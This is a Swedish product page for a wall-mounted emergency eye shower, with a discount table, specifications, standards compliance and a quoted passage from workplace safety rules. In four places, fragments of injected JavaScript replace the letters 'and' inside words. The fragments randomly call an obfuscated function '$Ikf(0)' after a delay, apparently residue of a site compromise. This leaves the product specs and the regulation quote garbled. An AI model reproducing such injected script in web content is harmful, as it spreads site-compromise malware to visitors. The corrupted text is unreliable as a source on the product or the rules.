Nöddusch Station

Mängdrabatt:

Antal Styckpris % rabatt
3 1395:- 6%
5 1349:- 9%

1,869kr

Artikelnr: GA3566P Kategori:

Produktinformation:

Väggmonterad ögondusch med automatisk tryck och flödeskontroll. Arbetstryck 2-7bar, anslutning DN15, avlopp DN32, skål av grön ABS plast.Uppfyller alla krav enligt SS-EN15154-1&2 och ANSI Z358:1-2004

Arbetstryck: 2 – 7 bar
Kapacitet: Ca 10 lit/min
Anslutning:  DN 15 inv.
Anvlopp: DN 32
Kulventil: Förnicklad mässing
Skål: Grön ABS plast
Tillbehör: Skyddsblandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andare 7559750
Användningsområde: Vid hantering av ej frätandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande ämnen.

Samtliga nöd- och ögonduschar är tillverkade och uppfyller villkoren enligt SS-EN 15154-1 & 2:2006 och ANSI norm. Z358.1-2004 samt AFS 1999:7. Att skölja bort aggressiva ämnen från huden eller ögonen tar ofta längre tid än man tror. Stänk av syra i ögonen måste sköljas i minst 15 minuter. Därför är det viktigt att man väljer rätt utrustning som har rätt flöde av mjukt vatten. Duscharna är utformade på sådant sätt att oberoende av ledningstryck, ger de en korrekt spolbild tack vare den inbyggda flödesregleringen som arbetar mellan 2 – 7 bar. För att minimera risken för bakterietillväxt är duscharna utrustade med dränering.

Utdrag ur Arbetsmiljöverkets regler AFS 1999:7
”Det skall finnas en fast ansluten ögonduschspolning till vattenledningssystemet där det finns risk för stänk av kemikalier, exempelvis vid batteriladdning. Vattnet skall vara tempererat, varvid en skyddsblandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andare monteras. Det skall finnas en nöddusch där det föreligger risk för översköljning av skadliga ämnen eller brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and i kläder. Nödduschen  skall kunna aktiveras från golv av krypandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande person.”